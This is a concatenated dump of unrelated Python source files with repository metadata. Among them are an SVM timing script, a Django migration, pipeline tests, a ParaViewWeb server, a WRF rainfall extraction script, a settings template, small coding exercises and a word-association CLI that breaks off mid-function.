002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,268 |
py
|
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
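# note (editor's aside): quit(-1) above exits the script at this point, so
# everything below is unreachable until that debug exit is removed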
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"[email protected]"
] | |
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"[email protected]"
] | |
7b0c4083d029a92441704bd296c1aef0ebbf84f2
|
2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06
|
/tests/pipelines/cnv_calling/test_xhmm_pca.py
|
e9dc13feb4ca41c6220481e9e7105e1e72bce443
|
[] |
no_license
|
biocodices/paip
|
4abd39cbbd372a68592da87177c70c403d5a661d
|
040a62c11e5bae306e2de4cc3e0a78772ee580b3
|
refs/heads/master
| 2021-01-17T20:48:28.642255 | 2019-07-26T14:30:58 | 2019-07-26T14:30:58 | 62,604,413 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,013 |
py
|
from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
|
[
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 |
Unlicense
| 2019-10-07T13:11:51 | 2019-10-07T12:47:05 |
C++
|
UTF-8
|
Python
| false | false | 442 |
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
015c735e062ac63dde157d1b06e700b8009e14ce
|
8a1241ac8ad91672aec81c878f2165a7678a1ad6
|
/Web/Applications/Visualizer/server/pv_web_visualizer.py
|
84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0
|
[
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] |
permissive
|
lmynsberge/ParaView
|
d9fbd0f4da197bc96172be8697ced76fe73852bf
|
2a68ee496949becf499742dfdbecb41b1eda81a7
|
refs/heads/master
| 2021-01-22T16:18:25.241194 | 2013-11-11T15:01:02 | 2013-11-11T15:01:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,203 |
py
|
r"""
This module is a ParaViewWeb server application.
The following command line illustrate how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
    --load-file tries to load the given file, relative to data-dir, if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script comes with a set of standard arguments that
can be overridden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
     By default, this variable is empty, which means we rely on another server
     to deliver the static content and the current process focuses only on the
     WebSocket connectivity of clients.
--authKey vtkweb-secret
    Secret key that should be provided by the client to allow it to make any
    WebSocket communication. If none is given, the client will assume that the
    server expects "vtkweb-secret" as the secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
    # Extract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
|
[
"[email protected]"
] | |
aa80166792010844c80020d87de369afec96d42a
|
5eff9df4d276e83c68ce843d58868499858f701a
|
/Leetcode - FB/p0350.py
|
3780986eb5c2d856d4e29deeeacac48b9f10fdf7
|
[] |
no_license
|
arunraman/Code-Katas
|
b6723deb00caed58f0c9a1cafdbe807e39e96961
|
7fe3582fa6acf59a2620fe73e1e14bd8635bbee8
|
refs/heads/master
| 2023-03-04T17:27:44.037145 | 2023-03-02T21:09:53 | 2023-03-02T21:09:53 | 25,232,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
class p0350(object):
def intersectiontwoArrays(self, nums1, nums2):
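        # Count each value of nums1, then emit nums2 elements while their
        # count lasts: the intersection with multiplicity (LeetCode 350).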
dict1 = dict()
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
ret = []
for i in nums2:
if i in dict1 and dict1[i] > 0:
ret.append(i)
dict1[i] -= 1
return ret
S = p0350()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2])
|
[
"[email protected]"
] | |
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93
|
021a3dff055d4b3e40aafc63f0029dc280466233
|
/db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py
|
e2bed1eb35b657a3592bea9d212fe72a3c8b6482
|
[] |
no_license
|
shadhini/curw_helpers
|
45efe90d887c702b3a3f5877163647e220d230e4
|
101d896f8b589b478ef146b5b4dd99ec24f2dc84
|
refs/heads/master
| 2021-07-03T02:53:13.398052 | 2020-10-28T03:39:58 | 2020-10-28T03:39:58 | 185,217,580 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,854 |
py
|
#!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
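    # Fetch one timestep of Kelani-basin rainfall via the stored procedure
    # and dump the values into a per-timestamp rfield text file.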
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
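    # Regenerate all rfield files for one WRF model: wipe stale outputs, read
    # the timeseries span from the DB, then write one rfield per 15-minute step.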
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
    Usage: python gen_rfield_kelani_basin_parallelized_optimized.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
if __name__=="__main__":
my_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model is None or wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour =re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
mp_pool = mp.Pool(mp.cpu_count())
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if my_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
|
[
"[email protected]"
] | |
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f
|
33f86c1678d2f5e15da77885e0bf770f405201a4
|
/tcamp/local_settings.example.py
|
b5b48f86971536c25ec25d5c61d13c2805a1304e
|
[
"BSD-3-Clause"
] |
permissive
|
imclab/tcamp
|
5410c9549ed7731575e7312acfed7b8e4cd0c58d
|
111cabab90b2c8cf651ee480520bc43a33f30844
|
refs/heads/master
| 2021-01-18T12:15:58.484183 | 2014-03-05T21:36:00 | 2014-03-05T21:36:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,832 |
py
|
DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
}
|
[
"[email protected]"
] | |
af0ff074d35191259400a9937db81997e7772ffd
|
d52cb4c2e880875944b14da0b8a9542235942ac8
|
/geeksforgeeks/heap/6_Find_median_in_stream.py
|
521a8f79468f59a0c175f5766c7681ae8d0a619c
|
[] |
no_license
|
saparia-data/data_structure
|
fbd61535b68f92143b2cb2679377c0f56f424670
|
2e8700cfdaeefe0093e5b4fb2704b1abcd300d02
|
refs/heads/master
| 2023-05-08T18:54:52.250941 | 2021-06-04T05:44:29 | 2021-06-04T05:44:29 | 296,071,146 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,382 |
py
|
'''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and, after each insertion of X, report the median of the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation:Flow in stream : 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1,3)
'''
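# Sketch of the two-heap invariant used below: max_heap holds the lower half
# of the data (stored negated, since heapq only provides a min-heap) and
# min_heap holds the upper half, so after balancing the median is always at
# one of the two heap tops (or the average of both when the count is even).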
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
    Uses the global min_heap and max_heap declared in the driver code and the
    heapq module imported above.
    Balances the sizes of the two heaps so that they differ by at most one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
    # take one element off the top of the larger heap and push it onto the other
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
    Uses the global min_heap and max_heap and the heapq module.
    :return: the median of the data received so far.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
    Uses the global min_heap and max_heap and the heapq module.
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian())
|
[
"[email protected]"
] | |
a15aa9381f0639460207512eace0c0e66ea54b4b
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py
|
1ce019700e7801903c6df341e812f94f4b2cb946
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 302 |
py
|
# Test your code a little at a time.
# Don't test everything only at the end, as that makes errors harder to pinpoint.
# Don't be intimidated by error messages. They help you fix your code.
x = int(input("enter the dividend: "))
y = int(input("enter the divisor: "))
print (x)
print (y)
print (x//y)
print (x%y)
|
[
"[email protected]"
] | |
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c
|
bec66ec0c920939547466b2b8f9d65813d560d1d
|
/noxious/__init__.py
|
f007d1198e0435f72d773eb479f29a48d9534092
|
[] |
no_license
|
mbr/noxious
|
cbb3be2ca725a0282db390520306da7ebba75339
|
6c48fe84867d80614defa6bdce4d4640ce657ae5
|
refs/heads/master
| 2023-06-06T20:42:08.079423 | 2015-08-30T10:54:52 | 2015-08-30T10:54:52 | 41,625,389 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,557 |
py
|
import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
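# Illustrative usage (the XML layout here is an assumption, not from the
# original module):
#   cfg = from_file('config.xml')  # e.g. <config><db port="5432"><host>x</host></db></config>
#   str(cfg['db']['host'])         # -> 'x'      (child lookup + element text)
#   cfg['db'].port                 # -> '5432'   (XML attribute access)
#   repr(cfg['db'])                # -> "config['db']"  (path, for debugging)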
|
[
"[email protected]"
] | |
4b2654ba6bffd9e20cf44a960e8ed5166476ba81
|
749aca95edfaad9e7d8b84dc2c6f62038595efc3
|
/mandala.py
|
dac1d0eae959c6a652cc1f391088ca60e9419b56
|
[] |
no_license
|
xmduhan/mandala
|
efe72b116ec829457cd2286b88b4544d5538861c
|
eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7
|
refs/heads/master
| 2021-06-30T16:30:49.410637 | 2017-09-20T09:44:53 | 2017-09-20T09:44:53 | 104,153,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,494 |
py
|
#!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
""" """
db.commit()
db.begin()
print u'保存成功!'
def rollback():
""" """
db.rollback()
db.begin()
print u'操作撤销'
def save(w0, w1):
""" """
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
        levelString = prompt(u'Max recursion depth (3): ')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
except Exception:
            print u'Invalid input; it must be an integer!'
def lookup():
""" """
w0 = prompt(u'关键字:')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
                # cycle detected
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
""" """
print u'再见!'
db.rollback()
exit()
def help():
""" """
print u'star: 星型添加'
print u'chain: 链式添加'
print u'commit: 保存'
print u'rollback: 取消'
print u'lookup: 查找'
print u'quit: 退出'
print u'help: 帮助'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
""" """
# 打印logo
f = Figlet(font='slant')
print f.renderText('Mandala')
# 读取并执行命令
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
                print u'Invalid command'
except KeyboardInterrupt:
